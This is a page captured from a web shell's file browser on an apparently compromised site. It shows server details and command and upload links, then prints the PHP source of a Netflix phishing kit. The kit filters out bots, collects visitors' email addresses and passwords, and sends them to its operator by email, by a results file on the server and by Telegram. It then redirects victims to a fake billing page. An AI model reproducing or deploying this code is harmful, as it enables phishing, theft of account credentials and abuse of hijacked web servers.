Server IP : 103.191.208.50 / Your IP : 216.73.216.226 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 5.6.40 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/celkcksm/bmtrust.org.in/admin/neflix/fad58/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); error_reporting(0); include 'autob/bt.php'; include 'autob/basicbot.php'; include 'autob/uacrawler.php'; include 'autob/refspam.php'; include 'autob/ipselect.php'; include 'autob/bts2.php'; include "req/config.php"; $email = $_POST['email'];$password = $_POST['password']; if(isset($_POST['email']) && isset($_POST['password'])){ if(preg_match("/[a-z0-9._%+-]+@[a-z0-9.-_]+\.[a-z]{2,}$/",strtolower($email)) || preg_match("/[0-9\s\-\(\)]{8,}/",strtolower($email))){ $_SESSION['action']='login'; ///////////////////////// MAIL PART ////////////////////// $email = $_POST['email']; $password = $_POST['password']; $PublicIP = $_SERVER['REMOTE_ADDR']; $Info_LOG = " |--===-====-===-- $resultheading --===-====-===--| -------------- ♥♥ NEW Netflix LOGIN ♥♥ ----------- Email : $email Password : $password "; $_SESSION['fullz']=$Info_LOG; $Info_LOG.=' '.$_SESSION['device']; // Don't Touche //Email if ($Send_Email == 1) { $subject = '♥♥ Netf1ix L0G ♥♥ '.$PublicIP ;$headers = 'From: YoCHI <yochnetf@yochnet.com>' . "\r\n" .'X-Mailer: PHP/' . phpversion(); mail($to, $subject, $Info_LOG, $headers); }; //FTP == 1 save result >< == 0 don't save result if ($Ftp_Write == 1) { @mkdir("../rst"); $file = fopen("../rst/Result_".$PublicIP.".txt", 'a'); fwrite($file, $Info_LOG); fclose($file); }; //TELEGRAM if ($send_tg == 1) { sendtoTG($tgid, $Info_LOG, $tgtoken); }; if($usecaution==1){header("location:error?y=".md5(rand(100, 999999999))."");} else{header("location:bill/basic?websrc=".md5('yochidemonArt'.rand(1000000000,500000000)));}; } else{header("location:".$index."?".$theerrkey."=c".md5(rand(100, 999999999)));}; } else{header("location:".$index."?".$theerrkey."=sdk".md5(rand(100, 999999999)));}; ?>